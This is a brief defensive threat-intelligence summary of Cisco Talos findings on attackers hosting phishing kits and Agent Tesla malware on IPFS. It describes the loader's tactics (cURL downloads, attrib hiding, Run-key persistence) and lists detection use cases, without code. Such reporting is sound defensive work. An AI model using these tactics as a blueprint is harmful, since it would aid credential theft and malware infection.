IPFS A Web3 Technology Used to Host Phishing & Malware
Category: Malware Campaigns | Industry: Global | Level: Tactical | Source: Cisco Talos
Cisco Talos researchers have discovered threat actors abusing the InterPlanetary File System (IPF), a Web3 protocol and peer-to-peer network to host malicious content. Current ongoing campaigns have used the IPF network to host malware payloads and phishing kit infrastructure. Although its being abused, IPF has legitimate uses, thus delineating between malicious and benign activity may be hard for security analysts to discern. Malicious use of IPF has been ongoing throughout 2022, however, a sharp spike was observed from Cisco Talos telemetry in September 2022. Threat actors are turning to this technology due to the protocol's advantages, "It provides low-cost storage for malicious payloads while offering resilience against content moderation, effectively acting as 'bulletproof hosting' for adversaries." Threat actor's using IPF, utilize the same Microsoft login and DocuSign credential-harvesting phishing templates. In one campaign, Agent Tesla malware was delivered from a phishing email hosted on IPFS infrastructure. Behaviors from the threat actors loader were all similar using LOLBins cmd and PowerShell to download Python, a Python executable, and second-stage malware with cURL. Files downloaded are hidden using the attrib command and persistence is created with entries to the Run registry. Campaigns using IPF technology is likely to increase and develop as Cisco Talos points out the platform provides "resilient against content moderation and law enforcement activities."
- AgentTesla - Infection
Anvilogic Use Cases:
- Invoke-WebRequest Command
- Suspicious Executable by CMD.exe
- Compressed File Execution